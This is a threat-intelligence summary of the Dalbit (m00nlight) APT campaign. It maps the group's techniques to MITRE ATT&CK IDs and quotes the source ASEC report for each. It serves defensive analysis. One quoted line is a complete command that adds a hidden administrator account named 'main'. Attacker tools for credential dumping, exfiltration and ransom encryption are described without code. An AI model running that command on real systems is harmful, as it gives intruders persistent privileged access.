Dalbit (m00nlight): Chinese Hacker Group’s APT Attack Campaign – ASEC BLOG

MITRE Techniques

• [T1059] Command and Scripting Interpreter – Dalbit uses WebShells to gain access and run commands, including launching tooling via web server processes. Quote: “Initial Access … they gain access to by exploiting vulnerabilities. They then attempt to control the systems with tools such as WebShell.”
• [T1105] Ingress Tool Transfer – The threat actor downloads hacking tools through default Windows programs after WebShell access. Quote: “The threat actor downloads other hacking tools through default Windows programs.”
• [T1562] Impair Defenses – VMProtect packing to evade detection and deletion of security logs; firewall turned off. Quote: “VMProtect is used to prevent hacking tools from being detected” and “Security event logs are deleted” / “Firewall OFF.”
• [T1053] Scheduled Task/Job – FRP is registered in Task Scheduler (schtasks) to sustain persistence. Quote: “the FRP was registered to the task scheduler (schtasks) under the name “debug” to maintain its persistence.”
• [T1136] Create Account – The group creates a new user account (e.g., “main”) for persistence. Quote: “net user main ff0.123456 /add & net localgroup administrators main /add.”
• [T1078] Valid Accounts – The threat actor uses stolen admin accounts in addition to newly created ones. Quote: “Aside from adding accounts, the threat actor would also use stolen admin accounts.”
• [T1114] Email Collection – A Golang email extraction tool targets Exchange and saves emails as EML files. Quote: “extract every email from the mailboxes of the target account according to the time received as an argument and saves them as an EML file.”
• [T1113] Screen Capture – Screenshots from infected PCs are sent to the actor’s server. Quote: “screenshots from a certain company’s infiltrated PC sent pictures every 5-10 seconds.”
• [T1003] OS Credential Dumping – LSASS credential dumping via Dumpert/Procdump and then Rsync to exfiltrate. Quote: “LSASS Dump information and EML files of certain accounts are usually the information that is stolen” and “The threat actor used Dumpert … to dump the lsass.exe process.”
• [T1021] Remote Services – Lateral movement via RDP after establishing proxy connections. Quote: “connect to … via Remote Desktop (RDP)”
• [T1046] Network Service Discovery – Internal reconnaissance uses network scanning tools (FScan, NBTScan, Goon). Quote: “Internal Reconnaissance: Tools such as network scanning tools and account theft tools are used for internal reconnaissance and obtaining information.”
• [T1027] Obfuscated/Compressed Files and Information – VMProtect packing of binaries to evade detection. Quote: “VMProtect Packing” and related evasion notes
• [T1567] Exfiltration – Exfiltration of data via Rsync to attacker server. Quote: “rsync … to send the dump file to their own server.”
• [T1486] Data Encrypted for Impact – BitLocker is used to encrypt drives and demand ransom. Quote: “BitLocker to encrypt certain drives and demand a ransom.”